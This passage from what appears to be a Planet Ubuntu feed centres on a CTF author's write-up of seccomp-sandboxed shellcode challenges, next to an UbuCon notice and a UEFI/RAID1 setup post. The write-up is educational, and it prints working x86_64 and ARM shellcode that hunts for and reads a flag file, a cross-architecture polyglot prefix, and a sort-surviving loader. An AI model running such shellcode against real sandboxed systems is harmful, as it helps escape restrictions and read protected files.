The second is the Fuck Mako Blog, which describes itself with a series of tag-lines including “Mako can fuck right off and we’re really not sorry about that,” “Welcome aboard the SS Fuck-Mako;” and “Because Mako is unnecessary.” Sub-pages of the site include:

The Anti-Mako Armada: “This armada sails itself.”
A collection of Anti-Mako essays

I’ll admit I’m a little disquieted.

2 days ago

David Tomaschik: BSidesSF CTF 2018: Coder Series (Author's PoV) from Planet Ubuntu


As the author of the “coder” series of challenges (Intel Coder, ARM Coder, Poly
Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my
perspective on the challenges. I can’t tell if the challenges were
uninteresting, too hard, or both, but they were solved by far fewer teams than I
had expected. (And fewer than we had rated the challenges for when scoring them.)

The entire series of challenges were based on the premise “give me your
shellcode and I’ll run it”, but with some limitations. Rather than forcing
players to find and exploit a vulnerability, we wanted to teach players about
dealing with restricted environments like sandboxes, unusual architectures, and
situations where your shellcode might be manipulated by the process before it runs.


Each challenge requested the length of your shellcode followed by the shellcode
and allowed for ~1k of shellcode (which is more than enough for any reasonable
exploitation effort on these). Shellcode was placed into newly-allocated memory
with RWX permissions, with a guard page above and below. A new stack was
allocated similarly, but without the execute bit set.

Each challenge got a seccomp-bpf sandbox setup, with slight variations in the
limitations of the sandbox to encourage players to look into how the sandbox is

All challenges allowed rt_sigreturn(), exit(), exit_group() and
close() for housekeeping purposes.
Intel Coder allowed open() (with limited arguments) and sendfile().
ARM Coder allowed open(), read(), and write(), all with limited arguments.
Poly Coder allowed read() and write(), but the file descriptors were
already opened for the player.
OCD Coder allowed open(), read(), write() and sendfile() with limited arguments.

The shellcode was then executed by a helper function written in assembly. (To
swap the stack then execute the shellcode.)

There were a few things that made these challenges harder than they might have
otherwise been:

Stripped binaries
PIE binaries and ASLR
Statically linking libseccomp (although I thought I was doing players a
favor with this, it does make the binary much larger)

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to
use a small subset of syscalls. seccomp-bpf extended this to use Berkeley
Packet Filters (BPF) to allow for filtering system calls. The system call
number and arguments (from registers) are placed into a structure, and the BPF
is used to filter this structure. The filter can result in allowing or denying
the syscall, and on a denied syscall, an error may be returned, a signal may be
delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows
for filtering not only based on the system call itself, but on the arguments
passed to the system call. One quirk of this is that it is completely unaware
of the types of the arguments, and only operates on the contents of the
registers used for passing arguments. Consequently, pointer types are compared
by the pointer value and not by the contents pointed to. I actually
hadn’t thought about this before writing this challenge and limiting the values
passed to open(). All of the challenges allowing open limited it to
./flag.txt, so not only could you only open that one file, you could only do
it by using the same pointer that was passed to the library functions that set up
the filtering.

An interesting corollary is that if you limit system call arguments by passing
in a pointer value, you probably want it to be a global, and you probably don’t
want it to be in writable memory, so that an attacker can’t overwrite the
desired string and still pass the same pointer.

Reverse Engineering the Sandbox

There’s a wonderful toolset called
seccomp-tools that provides the
ability to dump the BPF structure from the process as it runs by using
ptrace(). If we run the Intel coder binary under seccomp-tools, we’ll see
the following structure:

0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x11 0xc000003e if (A != ARCH_X86_64) goto 0019
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x0f 0x00 0x40000000 if (A >= 0x40000000) goto 0019
0004: 0x15 0x0d 0x00 0x00000003 if (A == close) goto 0018
0005: 0x15 0x0c 0x00 0x0000000f if (A == rt_sigreturn) goto 0018
0006: 0x15 0x0b 0x00 0x00000028 if (A == sendfile) goto 0018
0007: 0x15 0x0a 0x00 0x0000003c if (A == exit) goto 0018
0008: 0x15 0x09 0x00 0x000000e7 if (A == exit_group) goto 0018
0009: 0x15 0x00 0x09 0x00000002 if (A != open) goto 0019
0010: 0x20 0x00 0x00 0x00000014 A = args[0] >> 32
0011: 0x15 0x00 0x07 0x00005647 if (A != 0x5647) goto 0019
0012: 0x20 0x00 0x00 0x00000010 A = args[0]
0013: 0x15 0x00 0x05 0x8bd01428 if (A != 0x8bd01428) goto 0019
0014: 0x20 0x00 0x00 0x0000001c A = args[1] >> 32
0015: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0019
0016: 0x20 0x00 0x00 0x00000018 A = args[1]
0017: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0019
0018: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0019: 0x06 0x00 0x00 0x00000000 return KILL

The first two lines check the architecture of the running binary (presumably
because the system call numbers are architecture-dependent). The filter then
loads the system call number to determine the behavior for each syscall. Lines
0004 through 0008 are syscalls that are allowed unconditionally. Line 0009
ensures that anything but the already-allowed syscalls or open() results in
killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only
compare 32 bits at a time, the 64-bit registers are split in two with shifts.
The first few lines ensure that the filename string (args[0]) is a pointer
with value 0x56478bd01428. Of course, due to ASLR, you’ll find that this
value varies with each execution of the program, so no hard coding your pointer
values here! Finally, it checks that the second argument (args[1]) to
open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for writing!)

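To make the filter’s control flow concrete, here is a toy re-implementation of its decision logic in Python. The syscall numbers and the example pointer value come straight from the dump above; this is only an illustration of what this particular BPF program decides, not how the kernel actually evaluates it.

```python
# Decision logic of the dumped Intel Coder filter, transcribed by hand.
# FLAG_PTR is the pointer value from this particular run; ASLR changes
# it on every execution.
ARCH_X86_64 = 0xC000003E
ALLOWED = {3: "close", 15: "rt_sigreturn", 40: "sendfile",
           60: "exit", 231: "exit_group"}
SYS_OPEN = 2
FLAG_PTR = 0x56478BD01428  # args[0] the filter expects for open()

def seccomp_decision(arch: int, nr: int, args: list) -> str:
    if arch != ARCH_X86_64:
        return "KILL"
    if nr >= 0x40000000:          # line 0003: reject the x32 syscall range
        return "KILL"
    if nr in ALLOWED:             # lines 0004-0008: unconditional allows
        return "ALLOW"
    if nr != SYS_OPEN:            # line 0009: everything else dies
        return "KILL"
    # lines 0010-0017: exact pointer match, flags must be O_RDONLY (0)
    if args[0] != FLAG_PTR or args[1] != 0:
        return "KILL"
    return "ALLOW"
```

Feeding it sendfile() returns ALLOW unconditionally, while open() with any pointer other than the one used at filter-setup time kills the process, which is exactly the quirk discussed above.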
seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let’s
determine the steps we need to undertake:

Locate the ./flag.txt string that was used in the seccomp-bpf filter.
Open ./flag.txt.
Read the file and send the contents to the player. (sendfile() on Intel,
read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the
registers contained a value somewhere in the .text section of the binary, to
make it somewhat easier to hunt for the ./flag.txt string. (This was actually
always the address of the function that executed the player shellcode.)
Consequently, finding the string should have been trivial using the commonly
known egghunter techniques.

At this point, it’s basically just a straightforward shellcode to open() the
file and send its contents. The entirety of my example solution for Intel Coder follows:


; hunt for string based on rdx
hunt:
add rdx, 0x4
mov rax, 0x742e67616c662f2e ; ./flag.t
cmp rax, [rdx]
jne hunt

mov rdi, rdx ; path
xor rax, rax
mov al, 2 ; rax for SYS_open
xor rdx, rdx ; mode
xor rsi, rsi ; flags
syscall

xor rdi, rdi
inc rdi ; out_fd
mov rsi, rax ; in_fd from open
xor rdx, rdx ; offset
mov r10, 0xFF ; count
mov rax, 40 ; SYS_sendfile
syscall

xor rax, rax
mov al, 60 ; SYS_exit
xor rdi, rdi ; code
syscall

For ARM coder, the solution is much the same, except using read() and
write() instead of sendfile().

.section .text
.global shellcode

shellcode:
# r0 = my shellcode
# r1 = new stack
# r2 = some pointer

# load ./fl into r3
MOVW r3, #0x2f2e
MOVT r3, #0x6c66
# load ag.t into r4
MOVW r4, #0x6761
MOVT r4, #0x742e
hunt:
LDR r5, [r2, #0x4]!
TEQ r5, r3
BNE hunt
LDR r5, [r2, #0x4]
TEQ r5, r4
BNE hunt
# r2 should now have the address of ./flag.txt

# SYS_open
MOVW r7, #5
MOV r0, r2
MOVW r1, #0
MOVW r2, #0
SWI #0

# SYS_read
MOVW r7, #3
MOV r1, sp
MOV r2, #0xFF
SWI #0

# SYS_write
MOVW r7, #4
MOV r2, r0
MOV r1, sp
MOVW r0, #1
SWI #0

# SYS_exit
MOVW r7, #1
MOVW r0, #0
SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above
challenges. It required only reading from an already open FD and writing to an
already open FD. You did have to search through the FDs to find which were
open, but this was easy as any that were not would return -1, so looping until
an amount greater than 0 was read/written was all that was required.

To produce shellcode that ran on both architectures, you could use an
instruction that was a jump in one architecture and benign in the other. One
such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some
AND operation on r0 in ARM. Prefixing your shellcode with that, followed by
up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64
shellcode at the end would work.
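
The byte arithmetic of that layout can be sketched in Python. The placeholder shellcode bytes here are hypothetical, and real padding would need to be harmless ARM instructions rather than zeros:

```python
# Layout of the polyglot: EB 7F 00 32 is `jmp +0x7f` on x86_64 and a
# benign AND-style instruction on ARM, so x86 execution resumes at
# offset 2 + 0x7f = 0x81 while ARM falls through into the ARM code.
PREFIX = b"\xeb\x7f\x00\x32"
X86_ENTRY = 2 + 0x7F          # rel8 target: end of the 2-byte jmp + 0x7f

def build_polyglot(arm_code: bytes, x86_code: bytes) -> bytes:
    room = X86_ENTRY - len(PREFIX)    # 125 bytes for ARM code + padding
    if len(arm_code) > room:
        raise ValueError("ARM shellcode too large for the rel8 jump")
    return PREFIX + arm_code.ljust(room, b"\x00") + x86_code
```

A quick sanity check confirms the x86 shellcode lands at offset 0x81, past the entire ARM blob.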

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked “we
should sort their shellcode before we run it.” While intended as a joke, I took
this as a challenge and began work to see if this was solvable. Obviously, the
smaller the granularity (e.g., sorting by byte) the more difficult this becomes.
I settled on trying to find a solution where it was sorted by 32-bit (DWORD)
chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort
correctly, I wrote a small loader that was manually tweaked to sort. This
loader would then take the following shellcode and extract the lower 3 bytes of
each DWORD and concatenate them. In this way, I could force ordering by
inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]


[3 bytes shellcode][3 by
tes shellcode][3 bytes s

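The tagging arithmetic can be sanity-checked with a short Python round-trip. This only models the chunking and the loader’s extraction step; it does not capture the extra constraint that the real loader’s own instructions must also sort correctly:

```python
import struct

def encode(shellcode: bytes) -> list:
    """Split into 3-byte chunks; put an increasing tag byte in the most
    significant position of each little-endian DWORD."""
    chunks = [shellcode[i:i + 3].ljust(3, b"\x90")  # pad final chunk with nops
              for i in range(0, len(shellcode), 3)]
    return [struct.unpack("<I", chunk + bytes([tag]))[0]
            for tag, chunk in enumerate(chunks)]

def loader_extract(dwords) -> bytes:
    """What the loader does: keep the low 3 bytes of each DWORD."""
    return b"".join(struct.pack("<I", d)[:3] for d in dwords)

code = bytes(range(30))
tagged = encode(code)
# tag << 24 dominates each DWORD's value, so sorting the DWORDs
# preserves chunk order, and extraction recovers the original bytes
assert sorted(tagged) == tagged
assert loader_extract(sorted(tagged)) == code
```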
The loader is as simple as this:


# assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
loop:
inc edx
mov edx, [eax]
add eax, 4
mov [ebx], edx
inc ebx
inc ebx
inc ebx
dec ecx
jnz loop

The large number of nops was necessary to get the loader to sort properly, as
were tricks like using 3 inc ebx instructions instead of add ebx, 3.
There are even trash instructions like inc edx that have no effect on the
output, but serve just to get the shellcode to sort the way I needed. The x86
opcode reference was incredibly useful in
finding bytes with the desired value to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the
job done.


We’ll soon be releasing the source code to all of the challenges, so you can see
the details of how this was all put together, but I wanted to share my insight
into the challenges from the author’s point of view. Hopefully those who
solved it (or tried to solve it) had a good time doing so or learned something new.

3 days ago

Costales: UbuCon Europe 2018 | 1 Week to go!! from Planet Ubuntu

Yes! Everything is ready for the incoming UbuCon Europe 2018 in Xixón! 😃
We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be some in Spanish & Asturian too. \o/
The speakers are coming from all these countries! \o/
Are you ready for an incredible UbuCon? :)
Testing the Main Room #noedits
Remember that you have transport discounts and a main social event: the espicha.
See you in Xixón! ❤ + info

3 days ago

Kees Cook: UEFI booting and RAID1 from Planet Ubuntu

I spent some time yesterday building out a UEFI server that didn’t have on-board hardware RAID for its system drives. In these situations, I always use Linux’s md RAID1 for the root filesystem (and/or /boot). This worked well for BIOS booting since BIOS just transfers control blindly to the MBR of whatever disk it sees (modulo finding a “bootable partition” flag, etc, etc). This means that BIOS doesn’t really care what’s on the drive, it’ll hand over control to the GRUB code in the MBR.
With UEFI, the boot firmware is actually examining the GPT partition table, looking for the partition marked with the “EFI System Partition” (ESP) UUID. Then it looks for a FAT32 filesystem there, and does more things like looking at NVRAM boot entries, or just running BOOT/EFI/BOOTX64.EFI from the FAT32. Under Linux, this .EFI code is either GRUB itself, or Shim which loads GRUB.
So, if I want RAID1 for my root filesystem, that’s fine (GRUB will read md, LVM, etc), but how do I handle /boot/efi (the UEFI ESP)? In everything I found answering this question, the answer was “oh, just manually make an ESP on each drive in your RAID and copy the files around, add a separate NVRAM entry (with efibootmgr) for each drive, and you’re fine!” I did not like this one bit since it meant things could get out of sync between the copies, etc.
The current implementation of Linux’s md RAID puts metadata at the front of a partition. This solves more problems than it creates, but it means the RAID isn’t “invisible” to something that doesn’t know about the metadata. In fact, mdadm warns about this pretty loudly:
# mdadm --create /dev/md0 --level 1 --raid-disks 2 /dev/sda1 /dev/sdb1
mdadm: Note: this array has metadata at the start and
may not be suitable as a boot device. If you plan to
store '/boot' on this device please ensure that
your boot-loader understands md/v1.x metadata, or use --metadata=0.90

Reading from the mdadm man page:
-e, --metadata=
1, 1.0, 1.1, 1.2 default
Use the new version-1 format superblock. This has fewer
restrictions. It can easily be moved between hosts with
different endian-ness, and a recovery operation can be
checkpointed and restarted. The different sub-versions
store the superblock at different locations on the
device, either at the end (for 1.0), at the start (for
1.1) or 4K from the start (for 1.2). "1" is equivalent
to "1.2" (the commonly preferred 1.x format). "default"
is equivalent to "1.2".

First we toss a FAT32 on the RAID (mkfs.fat -F32 /dev/md0), and looking at the results, the first 4K is entirely zeros, and file doesn’t see a FAT filesystem:
# dd if=/dev/sda1 bs=1K count=5 status=none | hexdump -C
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00001000 fc 4e 2b a9 01 00 00 00 00 00 00 00 00 00 00 00 |.N+.............|
# file -s /dev/sda1
/dev/sda1: Linux Software RAID version 1.2 ...

So, instead, we’ll use --metadata 1.0 to put the RAID metadata at the end:
# mdadm --create /dev/md0 --level 1 --raid-disks 2 --metadata 1.0 /dev/sda1 /dev/sdb1
# mkfs.fat -F32 /dev/md0
# dd if=/dev/sda1 bs=1 skip=80 count=16 status=none | xxd
00000000: 2020 4641 5433 3220 2020 0e1f be77 7cac FAT32 ...w|.
# file -s /dev/sda1
/dev/sda1: ... FAT (32 bit)

Now we have a visible FAT32 filesystem on the ESP. UEFI should be able to boot whatever disk hasn’t failed, and grub-install will write to the RAID mounted at /boot/efi.
However, we’re left with a new problem: on (at least) Debian and Ubuntu, grub-install attempts to run efibootmgr to record which disk UEFI should boot from. This fails, though, since it expects a single disk, not a RAID set. In fact, it returns nothing, and tries to run efibootmgr with an empty -d argument:
Installing for x86_64-efi platform.
efibootmgr: option requires an argument -- 'd'
grub-install: error: efibootmgr failed to register the boot entry: Operation not permitted.
Failed: grub-install --target=x86_64-efi
WARNING: Bootloader is not properly installed, system may not be bootable

Luckily my UEFI boots without NVRAM entries, and I can disable the NVRAM writing via the “Update NVRAM variables to automatically boot into Debian?” debconf prompt when running: dpkg-reconfigure -p low grub-efi-amd64
So, now my system will boot with both or either drive present, and updates from Linux to /boot/efi are visible on all RAID members at boot-time. HOWEVER there is one nasty risk with this setup: if UEFI writes anything to one of the drives (which this firmware did when it wrote out a “boot variable cache” file), it may lead to corrupted results once Linux mounts the RAID (since the member drives won’t have identical block-level copies of the FAT32 any more).
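
One way to notice that an external write has happened is to compare the member partitions’ data areas directly before assembly. Here is a rough sketch; the device paths are examples, and since 1.0 metadata lives at the tail (where per-device superblocks may legitimately differ), only the leading data area is hashed:

```python
import hashlib

def digest(path: str, nbytes: int = 64 * 1024 * 1024) -> str:
    """SHA-256 of the first nbytes of a block device (or file)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while nbytes > 0:
            block = f.read(min(1 << 20, nbytes))
            if not block:
                break
            h.update(block)
            nbytes -= len(block)
    return h.hexdigest()

# If these differ, something (e.g. the firmware) wrote to one member
# behind the RAID's back:
# digest("/dev/sda1") == digest("/dev/sdb1")
```
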
To deal with this “external write” situation, I see some solutions:

Make the partition read-only when not under Linux. (I don’t think this is a thing.)
Build higher-level knowledge of the root-filesystem RAID configuration to keep a collection of filesystems manually synchronized instead of doing block-level RAID. (Seems like a lot of work and would need a redesign of /boot/efi into something like /boot/efi/booted, /boot/efi/spare1, /boot/efi/spare2, etc.)
Prefer one RAID member’s copy of /boot/efi and rebuild the RAID at every boot. If there were no external writes, there’s no issue. (Though what’s really the right way to pick the copy to prefer?)

Since mdadm has the “--update=resync” assembly option, I can actually implement the last option. This required updating /etc/mdadm/mdadm.conf to add <ignore> on the RAID’s ARRAY line to keep it from auto-starting:
ARRAY <ignore> metadata=1.0 UUID=123...

(Since it’s ignored, I’ve chosen /dev/md100 for the manual assembly below.) Then I added the noauto option to the /boot/efi entry in /etc/fstab:
/dev/md100 /boot/efi vfat noauto,defaults 0 0

And finally I added a systemd oneshot service that assembles the RAID with resync and mounts it:
[Unit]
Description=Resync /boot/efi RAID

[Service]
Type=oneshot
ExecStart=/sbin/mdadm -A /dev/md100 --uuid=123... --update=resync
ExecStart=/bin/mount /boot/efi


(And don’t forget to run “update-initramfs -u” so the initramfs has an updated copy of /etc/mdadm/mdadm.conf.)
If mdadm.conf supported an “update=” option for ARRAY lines, this would have been trivial. Looking at the source, though, that kind of change doesn’t look easy. I can dream!
And if I wanted to keep a “pristine” version of /boot/efi that UEFI couldn’t update I could rearrange things more dramatically to keep the primary RAID member as a loopback device on a file in the root filesystem (e.g. /boot/efi.img). This would make all external changes in the real ESPs disappear after resync. Something like:

# truncate --size 512M /boot/efi.img
# losetup -f --show /boot/efi.img
# mdadm --create /dev/md100 --level 1 --raid-disks 3 --metadata 1.0 /dev/loop0 /dev/sda1 /dev/sdb1

And at boot just rebuild it from /dev/loop0, though I’m not sure how to “prefer” that partition…
© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

4 days ago